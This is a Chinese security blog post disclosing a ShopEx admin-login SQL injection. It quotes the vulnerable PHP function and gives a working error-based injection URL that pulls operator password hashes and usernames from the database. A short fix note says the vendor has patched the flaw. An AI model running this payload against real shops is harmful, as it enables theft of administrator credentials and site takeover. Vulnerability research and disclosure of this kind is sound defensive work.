您的位置 » 首页 » 代码审计 » 代码审计:Shopex后台登录页面注入漏洞附利用POC

代码审计:Shopex后台登录页面注入漏洞附利用POC

发表于4年前 | 作者: seay | 分类: 代码审计 | 孵化于:2013年10月16日 | 文章热度:5,446 次 全屏阅读

显示不全请点击全屏阅读

对登录时传递的某参数未做过滤,导致注入的产生

最近做二次开发的时候看到了登录的流程
发现在文件\shopex\core\admin\controller\ctl.passport.php
处理了验证码,管理帐号和密码,但是在最底下发现一个sess_id

function certi_validate(){ 
        $cert = $this->system->loadModel('service/certificate'); 
        $sess_id = $_POST['session_id']; 
  
        $return = array(); 
        if($sess_id == $cert->get_sess()){ 
            $return = array( 
                'res' => 'succ', 
                'msg' => '', 
                'info' => ''
            ); 
  
            echo json_encode($return); 
        }else{ 
            $return = array( 
                'res' => 'fail', 
                'msg' => '000001', 
                'info' => 'You have the different session!'
            ); 
  
            echo json_encode($return); 
        } 
    }
没做处理。直接导致sql注入产生。还在学php,分析错的地方请指正

http://fuck.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1
 
 
利用:
http://fuck.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1
顺带路径一起爆出来了

修复方案:

过滤,官方已经升级修复,请用户及时升级

作者:saline

 

 

Tags:

ShopEx漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3426/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有1个筒子留下了脚印...

  • s 说:
    1楼
    2013 年 10 月 17 日 下午 12:58 回复

    恩··有测试成功的·但是大多数一片空白·· 😈

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)